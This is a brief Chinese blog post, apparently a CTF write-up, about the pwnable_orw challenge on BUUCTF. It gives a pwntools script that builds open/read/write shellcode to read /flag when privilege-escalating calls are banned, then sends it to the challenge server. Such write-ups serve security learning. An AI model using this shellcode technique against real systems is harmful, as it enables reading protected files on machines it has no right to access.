pwnable_orw 学习shellcraft新花样

写shellcode,由于我还没开始写反汇编引擎,所以直接去百度了下

把提权函数给ban了,所以只能直接读取flag,看了下pwnki师傅的博客

学到了shellcraft的新花样,有意思

from pwn import *

#p=process('./orw')
p=remote('node3.buuoj.cn',26136)
shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('eax','esp',100)
shellcode += shellcraft.write(1,'esp',100)
shellcode = asm(shellcode)
p.sendline(shellcode)
p.interactive()

 

posted @ 2021-01-13 22:40  PYozo_free  阅读(557)  评论(0编辑  收藏  举报